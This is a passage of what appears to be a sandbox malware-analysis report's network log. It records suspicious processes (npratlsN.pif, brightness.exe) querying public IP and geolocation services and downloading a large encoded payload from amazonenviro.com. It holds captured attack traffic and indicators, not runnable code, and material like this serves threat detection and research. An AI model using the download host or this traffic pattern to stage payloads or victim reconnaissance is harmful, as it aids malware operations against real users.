Jan 14, 2025 08:08:52.689090014 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	52791	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:53.299577951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:54.134176970 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	52793	132.226.8.169	80	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:54.757535934 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:55.595376968 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	166.62.27.188	443	8092	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:14 UTC	171	OUT	GET /admin/245_Nsltarpncon HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
2025-01-14 07:08:14 UTC	269	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:14 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 10 Jan 2025 16:03:39 GMT ETag: "2ca4707-bf154-62b5c3ce70cd3" Accept-Ranges: bytes Content-Length: 782676 Vary: Accept-Encoding
2025-01-14 07:08:14 UTC	7923	IN	Data Raw: 37 75 41 62 2b 4b 74 68 6d 62 75 45 65 38 7a 76 74 57 47 56 6b 6c 49 44 69 75 5a 4d 45 42 46 72 53 76 4f 66 31 6d 51 4b 43 35 68 42 45 48 69 39 4d 79 57 6e 50 68 69 42 75 45 59 4b 70 54 6f 54 67 4b 6f 37 45 59 30 74 46 33 65 79 4c 42 47 6d 4f 51 74 33 70 78 6f 2f 73 68 30 35 30 70 64 78 31 47 48 35 4c 55 58 71 37 46 48 41 45 6b 44 57 70 68 55 32 71 51 6f 7a 4d 76 2b 48 54 37 75 6e 73 2b 48 6a 58 43 79 7a 46 66 4e 72 73 55 6a 71 65 52 54 30 65 62 6c 4b 36 6e 4d 67 4b 64 4c 49 4c 42 68 31 5a 2f 2f 59 7a 4b 65 35 5a 33 72 6b 38 45 53 33 34 44 47 6d 35 79 6e 70 77 2b 42 45 6b 4d 6b 39 37 62 47 61 49 48 43 6f 5a 67 64 72 32 43 46 33 79 55 41 6d 4a 4a 53 78 38 65 4a 78 57 50 42 35 78 6b 4b 6d 63 31 38 44 66 72 73 32 6a 48 6f 6a 53 35 76 63 5a 34 36 79 54 31 6d Data Ascii: 7uAb+KthmbuEe8zvtWGVklIDiuZMEBFrSvOf1mQKC5hBEHi9MyWnPhiBuEYKpToTgKo7EY0tF3eyLBGmOQt3pxo/sh050pdx1GH5LUXq7FHAEkDWphU2qQozMv+HT7uns+HjXCyzFfNrsUjqeRT0eblK6nMgKdLILBh1Z//YzKe5Z3rk8ES34DGm5ynpw+BEkMk97bGaIHCoZgdr2CF3yUAmJJSx8eJxWPB5xkKmc18Dfrs2jHojS5vcZ46yT1m
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 4e 68 35 61 49 6b 6b 7a 48 42 51 70 79 54 31 6b 4a 64 6c 62 62 6b 6a 35 55 68 39 35 4a 69 66 56 55 68 50 51 64 6d 6a 38 49 71 38 79 52 50 4c 33 36 53 4e 52 77 31 6e 31 55 41 58 54 6c 55 4a 51 45 52 41 71 69 6e 63 4a 51 4d 2f 62 31 31 6e 61 75 39 51 70 6b 37 75 30 6d 4a 4e 44 37 67 77 63 53 37 79 2f 74 67 39 39 4e 64 7a 74 2f 65 50 42 31 42 57 78 74 66 65 46 70 51 37 47 47 4d 32 56 37 4e 46 2f 36 33 6c 50 49 63 76 6d 48 69 52 71 6d 66 49 54 48 46 59 30 4a 41 58 79 50 5a 38 76 70 4b 76 66 49 77 6c 5a 2b 79 65 41 77 75 78 6c 6b 57 38 42 56 4e 72 35 6d 7a 30 33 54 33 6c 30 55 51 7a 39 4a 64 68 4d 36 54 39 36 63 54 6e 59 41 4c 69 49 45 58 6e 62 62 57 6a 78 6c 76 34 77 4f 4f 43 66 69 38 6d 2b 32 2b 66 4c 73 41 45 72 5a 52 71 55 72 49 68 73 4c 73 68 36 68 71 35 Data Ascii: Nh5aIkkzHBQpyT1kJdlbbkj5Uh95JifVUhPQdmj8Iq8yRPL36SNRw1n1UAXTlUJQERAqincJQM/b11nau9Qpk7u0mJND7gwcS7y/tg99Ndzt/ePB1BWxtfeFpQ7GGM2V7NF/63lPIcvmHiRqmfITHFY0JAXyPZ8vpKvfIwlZ+yeAwuxlkW8BVNr5mz03T3l0UQz9JdhM6T96cTnYALiIEXnbbWjxlv4wOOCfi8m+2+fLsAErZRqUrIhsLsh6hq5
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 43 7a 34 2b 68 6c 45 6d 45 6a 6b 53 7a 79 6e 30 6a 4f 78 59 79 4f 35 70 67 59 30 6e 6d 6f 74 44 4d 62 4e 4e 4f 4a 43 62 31 4d 58 5a 48 58 62 52 52 54 44 4c 76 57 61 70 38 44 30 38 4b 38 65 4b 67 34 46 5a 74 30 38 63 54 78 58 76 64 77 32 52 7a 79 58 6f 6b 4a 74 64 31 67 5a 61 34 36 32 44 6c 66 2b 7a 75 38 57 49 6b 4a 6e 67 37 39 63 7a 4e 77 6f 69 45 68 49 63 57 6f 6c 54 61 7a 2b 53 6f 78 4f 70 67 70 30 73 4a 58 6e 59 59 38 66 53 57 2f 53 31 2f 50 4e 61 62 77 39 39 44 4b 50 42 42 6e 6e 4b 68 78 6c 67 67 70 68 77 70 74 2b 5a 66 75 2f 57 74 35 37 6a 72 63 6c 57 55 52 44 2b 5a 39 7a 6e 34 4a 61 4a 6a 76 51 58 2f 35 37 69 32 52 57 36 7a 32 2b 4a 6e 30 33 37 7a 4e 6d 6b 48 49 48 78 76 48 33 78 6a 42 56 7a 67 6b 33 49 31 72 59 71 2b 76 38 49 4d 6f 47 49 6a 50 66 Data Ascii: Cz4+hlEmEjkSzyn0jOxYyO5pgY0nmotDMbNNOJCb1MXZHXbRRTDLvWap8D08K8eKg4FZt08cTxXvdw2RzyXokJtd1gZa462Dlf+zu8WIkJng79czNwoiEhIcWolTaz+SoxOpgp0sJXnYY8fSW/S1/PNabw99DKPBBnnKhxlggphwpt+Zfu/Wt57jrclWURD+Z9zn4JaJjvQX/57i2RW6z2+Jn037zNmkHIHxvH3xjBVzgk3I1rYq+v8IMoGIjPf
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 6e 6d 63 68 6e 6b 56 55 73 58 53 59 6b 39 79 6f 55 4b 77 51 69 35 77 62 4e 71 57 4c 33 4d 7a 39 33 6b 6a 49 31 4c 69 51 6d 4e 33 72 65 65 58 36 41 6b 57 74 6d 47 42 48 6b 34 69 31 78 47 4c 57 63 6e 33 68 65 36 78 77 38 75 79 37 77 4a 43 5a 4d 4d 56 42 4b 6e 75 56 47 51 56 43 37 2b 4c 76 46 4b 4d 38 34 72 41 38 77 4e 4e 47 4b 46 62 57 65 30 42 31 4e 6c 4c 62 4a 6d 4d 77 4c 34 66 32 57 6d 30 49 41 79 56 31 6a 63 55 51 34 59 38 4a 61 78 4c 73 6d 4a 73 58 6e 57 71 70 61 68 4a 56 64 59 42 67 45 34 5a 55 72 70 61 42 6e 7a 4d 38 58 77 45 36 46 33 53 39 31 54 39 63 6f 53 5a 66 42 78 66 77 67 35 49 5a 75 52 55 4b 73 58 51 4a 57 4c 6f 35 33 47 37 74 5a 4f 46 78 48 6e 33 74 6b 6c 2b 37 58 6d 71 4e 53 54 6b 42 64 4a 43 59 4d 6d 4a 44 48 61 34 77 65 33 52 36 57 37 59 Data Ascii: nmchnkVUsXSYk9yoUKwQi5wbNqWL3Mz93kjI1LiQmN3reeX6AkWtmGBHk4i1xGLWcn3he6xw8uy7wJCZMMVBKnuVGQVC7+LvFKM84rA8wNNGKFbWe0B1NlLbJmMwL4f2Wm0IAyV1jcUQ4Y8JaxLsmJsXnWqpahJVdYBgE4ZUrpaBnzM8XwE6F3S91T9coSZfBxfwg5IZuRUKsXQJWLo53G7tZOFxHn3tkl+7XmqNSTkBdJCYMmJDHa4we3R6W7Y
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 78 51 38 77 59 2b 54 71 69 36 73 49 33 37 63 4e 56 4c 70 55 5a 63 46 50 43 6b 47 58 42 47 43 51 6d 54 54 6b 6c 68 49 4a 44 2b 47 4d 4d 57 73 72 49 4e 49 75 30 74 6e 69 76 52 48 72 50 65 49 2b 4a 73 69 45 62 54 67 45 68 37 59 57 4a 42 70 47 6b 63 4e 6e 55 64 39 45 68 78 64 42 73 73 63 6b 51 75 68 71 4f 79 6e 76 48 77 6d 43 63 6a 77 50 49 45 71 73 70 6e 35 67 7a 37 6c 46 76 4f 52 31 6e 59 35 6a 48 66 30 64 41 58 38 74 59 31 4b 2f 64 4b 4e 65 69 73 36 53 5a 57 69 57 78 6a 61 6e 6b 47 42 6b 52 2f 55 43 49 6f 2b 56 55 78 56 71 54 34 45 57 79 57 70 6a 30 33 47 6c 39 54 44 53 6e 48 57 74 6b 42 36 46 53 73 56 41 48 30 43 78 38 36 52 54 37 7a 6a 6f 5a 46 73 66 4a 5a 36 41 50 58 35 67 44 4d 63 77 45 30 45 41 65 51 36 35 37 6a 32 44 6b 49 33 47 63 63 47 44 6c 33 2b Data Ascii: xQ8wY+Tqi6sI37cNVLpUZcFPCkGXBGCQmTTklhIJD+GMMWsrINIu0tnivRHrPeI+JsiEbTgEh7YWJBpGkcNnUd9EhxdBssckQuhqOynvHwmCcjwPIEqspn5gz7lFvOR1nY5jHf0dAX8tY1K/dKNeis6SZWiWxjankGBkR/UCIo+VUxVqT4EWyWpj03Gl9TDSnHWtkB6FSsVAH0Cx86RT7zjoZFsfJZ6APX5gDMcwE0EAeQ657j2DkI3GccGDl3+
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 6d 75 47 52 4e 77 65 50 69 42 51 5a 57 71 51 49 66 6f 45 30 32 44 32 52 66 4a 43 54 74 75 6b 64 31 6e 30 53 77 6e 63 66 77 38 52 46 6b 43 59 6f 79 78 66 7a 53 51 67 30 64 6b 6d 4c 4f 65 6e 67 32 4f 30 74 75 70 66 49 37 6b 37 52 6a 39 69 46 69 51 6b 47 73 6d 50 34 70 72 71 57 78 49 79 4b 63 6b 51 36 67 56 5a 32 2f 6a 2f 7a 64 74 43 4c 33 77 6b 64 56 38 78 44 56 37 44 33 59 48 58 62 6d 34 4a 64 54 35 48 49 56 75 34 53 4f 58 59 6f 49 36 79 75 39 54 78 6b 6c 4d 77 64 63 71 76 54 35 51 75 54 4a 5a 47 72 46 72 5a 4d 51 39 73 6e 7a 77 33 67 65 6e 51 2f 54 79 42 62 6b 79 42 68 45 48 50 67 6a 79 65 43 31 6f 74 44 58 64 42 4c 63 48 73 49 4f 79 6a 46 63 2b 4b 4b 6c 43 38 72 78 74 49 55 33 4f 67 36 30 32 4c 7a 61 6a 61 58 7a 53 66 4a 4e 62 46 72 53 4c 43 32 57 37 49 Data Ascii: muGRNwePiBQZWqQIfoE02D2RfJCTtukd1n0Swncfw8RFkCYoyxfzSQg0dkmLOeng2O0tupfI7k7Rj9iFiQkGsmP4prqWxIyKckQ6gVZ2/j/zdtCL3wkdV8xDV7D3YHXbm4JdT5HIVu4SOXYoI6yu9TxklMwdcqvT5QuTJZGrFrZMQ9snzw3genQ/TyBbkyBhEHPgjyeC1otDXdBLcHsIOyjFc+KKlC8rxtIU3Og602LzajaXzSfJNbFrSLC2W7I
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 4a 66 44 45 44 32 37 6d 32 4a 62 7a 41 42 73 6e 66 71 31 63 64 62 35 79 7a 47 37 66 6d 66 69 33 46 79 52 30 57 67 64 56 42 46 63 45 76 5a 31 4a 48 49 41 7a 6b 56 64 47 63 44 49 53 53 42 79 6d 64 69 6d 76 35 61 6c 32 44 58 4b 6f 6c 76 78 78 68 7a 52 38 35 64 79 68 55 74 77 44 35 39 6a 58 31 61 50 36 4f 31 31 42 66 42 65 4a 49 33 6c 47 49 42 6c 55 73 45 70 77 78 4a 69 5a 4f 4d 43 41 6b 4a 6c 50 4f 51 53 2b 59 46 34 38 68 79 55 6f 41 4d 4e 4c 72 56 48 2f 63 72 64 4e 59 58 6e 65 79 63 62 31 4f 6c 62 67 51 76 2f 4e 59 63 43 59 6b 69 75 7a 4d 61 78 4c 4e 70 2f 2b 51 4d 69 58 4b 56 6a 55 72 34 76 49 72 4b 45 75 34 33 6a 76 4b 6e 2b 39 45 59 36 33 31 74 70 32 61 4c 6c 76 56 54 45 5a 69 6f 64 75 6c 75 49 2b 66 4e 30 33 75 38 47 64 6c 74 6d 64 2f 46 62 4d 57 53 54 Data Ascii: JfDED27m2JbzABsnfq1cdb5yzG7fmfi3FyR0WgdVBFcEvZ1JHIAzkVdGcDISSBymdimv5al2DXKolvxxhzR85dyhUtwD59jX1aP6O11BfBeJI3lGIBlUsEpwxJiZOMCAkJlPOQS+YF48hyUoAMNLrVH/crdNYXneycb1OlbgQv/NYcCYkiuzMaxLNp/+QMiXKVjUr4vIrKEu43jvKn+9EY631tp2aLlvVTEZioduluI+fN03u8Gdltmd/FbMWST
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 37 47 45 55 6a 34 71 67 33 56 65 6e 4f 37 66 69 66 59 4b 6c 52 62 4d 6d 4c 31 34 34 78 61 41 6c 74 49 71 38 33 4e 51 75 4c 4f 72 72 78 4f 6a 34 74 59 30 37 4c 38 66 71 41 68 65 4f 6a 44 7a 73 47 53 43 43 57 67 37 55 69 45 71 39 48 56 39 7a 55 32 38 6f 4a 4c 72 68 61 54 2b 30 6f 52 30 6b 37 6c 36 32 65 6a 39 6c 43 64 74 46 66 50 64 71 67 4a 53 45 48 74 33 30 4e 44 43 70 48 63 5a 75 44 47 67 4c 68 75 50 57 57 66 79 6b 71 6a 4d 43 2b 43 50 73 52 55 68 50 52 31 70 54 6d 76 78 78 6a 49 52 4f 55 6c 78 58 6d 6f 55 44 55 6f 62 42 4e 43 44 2f 68 71 4a 6c 77 4e 6a 57 68 38 45 53 36 43 4d 77 4c 4d 41 6e 4b 75 6f 71 30 75 41 55 43 78 73 66 4d 53 4f 33 59 2f 72 52 61 4c 6c 57 64 31 78 73 2f 30 32 35 45 34 57 6c 6d 4a 78 4e 52 7a 4d 7a 53 4a 51 76 57 31 74 57 62 39 4d Data Ascii: 7GEUj4qg3VenO7fifYKlRbMmL144xaAltIq83NQuLOrrxOj4tY07L8fqAheOjDzsGSCCWg7UiEq9HV9zU28oJLrhaT+0oR0k7l62ej9lCdtFfPdqgJSEHt30NDCpHcZuDGgLhuPWWfykqjMC+CPsRUhPR1pTmvxxjIROUlxXmoUDUobBNCD/hqJlwNjWh8ES6CMwLMAnKuoq0uAUCxsfMSO3Y/rRaLlWd1xs/025E4WlmJxNRzMzSJQvW1tWb9M
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 36 70 52 56 46 39 63 6a 34 57 31 69 72 6c 53 59 6b 39 68 59 37 78 56 68 7a 36 59 78 74 44 58 34 53 44 37 59 48 6c 59 54 44 43 2b 49 6f 48 6f 74 69 4d 65 4d 4f 70 4c 6d 2b 70 74 4c 30 77 37 64 45 51 7a 45 73 78 33 75 31 76 6d 35 4e 7a 6b 65 72 38 67 63 70 6e 66 72 6e 59 49 7a 4a 38 50 6a 6d 79 6a 44 47 47 65 62 31 42 6c 72 2f 67 58 47 69 54 4b 74 46 6f 6a 77 31 6c 64 74 6c 6c 5a 78 71 34 50 34 4c 53 71 49 50 68 78 72 70 51 6d 67 73 4f 4f 76 4f 6c 4b 64 71 52 7a 59 54 45 30 62 39 52 63 6d 4f 45 35 6f 7a 49 67 47 41 69 61 4d 33 58 56 53 62 2f 64 72 62 4a 69 54 78 2f 47 71 47 55 79 51 6d 5a 33 64 62 76 49 63 51 7a 73 4f 7a 66 2b 6e 51 4c 78 47 74 49 41 6c 4d 59 66 79 6e 6a 6f 6a 37 62 4e 50 68 7a 6a 43 47 42 6c 4f 78 72 45 35 32 78 55 6f 30 45 44 53 63 7a 30 Data Ascii: 6pRVF9cj4W1irlSYk9hY7xVhz6YxtDX4SD7YHlYTDC+IoHotiMeMOpLm+ptL0w7dEQzEsx3u1vm5Nzker8gcpnfrnYIzJ8PjmyjDGGeb1Blr/gXGiTKtFojw1ldtllZxq4P4LSqIPhxrpQmgsOOvOlKdqRzYTE0b9RcmOE5ozIgGAiaM3XVSb/drbJiTx/GqGUyQmZ3dbvIcQzsOzf+nQLxGtIAlMYfynjoj7bNPhzjCGBlOxrE52xUo0EDScz0
2025-01-14 07:08:15 UTC	8000	IN	Data Raw: 34 38 5a 35 39 77 59 42 66 56 47 47 55 67 33 70 71 2f 44 62 38 76 54 4b 76 47 4d 53 41 30 58 57 59 47 45 72 54 70 76 31 55 45 79 51 6d 62 62 50 4a 39 36 42 72 76 39 6d 47 68 53 58 4e 33 4e 2f 32 76 6e 62 45 57 73 74 64 61 6e 52 33 34 62 6d 59 38 58 4d 37 43 74 41 32 33 39 6d 41 55 54 44 46 51 69 37 67 73 76 73 57 4a 69 53 6d 33 49 6b 49 39 49 48 61 32 39 77 4a 71 50 55 5a 54 41 4d 36 42 4d 5a 6c 75 58 34 67 2b 4b 75 6e 4b 59 68 32 2f 79 4e 46 4b 78 31 31 71 54 2b 36 75 39 2b 39 30 72 47 57 43 59 66 6a 68 43 67 47 4a 7a 5a 72 53 68 52 51 41 76 62 64 4b 54 64 73 39 44 31 6d 2b 4d 71 6e 2f 5a 66 7a 75 48 55 57 46 57 72 78 69 6b 62 36 52 34 7a 4e 42 41 78 4f 57 6c 58 4f 34 68 51 62 4f 38 71 6e 5a 6a 47 31 4d 71 76 57 2f 4d 52 42 6f 70 31 55 54 32 6a 56 65 4b Data Ascii: 48Z59wYBfVGGUg3pq/Db8vTKvGMSA0XWYGErTpv1UEyQmbbPJ96Brv9mGhSXN3N/2vnbEWstdanR34bmY8XM7CtA239mAUTDFQi7gsvsWJiSm3IkI9IHa29wJqPUZTAM6BMZluX4g+KunKYh2/yNFKx11qT+6u9+90rGWCYfjhCgGJzZrShRQAvbdKTds9D1m+Mqn/ZfzuHUWFWrxikb6R4zNBAxOWlXO4hQbO8qnZjG1MqvW/MRBop1UT2jVeK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49757	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:24 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153293 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gU%2FRms7qNpy9%2B717E3u21DFY3gCVe5iszZ1GkvYpsAcK%2FacrY3xzvJALtTNNCaTX2BWfaEob6YjsmbWtThsIiwkZSlD3wUezoyEvK0Bj685C6onf1Bblyn4l51Fztj3WShG94We9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb6d8d060fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1440&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1882656&cwnd=252&unsent_bytes=0&cid=8858a7664a426b1b&ts=395&x=0"
2025-01-14 07:08:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49758	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:25 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153294 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CrKL2UZBDigqmYCnG4s4YWKk50EXQY8LIqNQA96LkETMb9wxlS9bQmbDJXFqdp%2BrGMtBHXqmvlFPGAbDCq7RHyrU6ajRLwXk3%2FfVs4%2BU%2BF7LMGStV4vgzA%2FQWYQN75KpVE4gxDDl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb73784e0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1450&min_rtt=1445&rtt_var=553&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1957104&cwnd=252&unsent_bytes=0&cid=7641a520d941cc87&ts=160&x=0"
2025-01-14 07:08:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	52744	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:27 UTC	864	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153297 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIICdwFSPWL3Q%2B4F%2BCr2FnuVv3EqcMQm%2F5sIwvXJJXqaDzrk1%2B4ZaDM67f20%2FNWoAD8HfGl2wFdvSL0WIiNbSUu6BVXKysivZKd%2BYowCiTfWJGmA7gHRlJLN1YwWoaoJ%2BNOJPkkr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb822a3e41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1702&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1637689&cwnd=192&unsent_bytes=0&cid=6820bb286bb66791&ts=1065&x=0"
2025-01-14 07:08:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 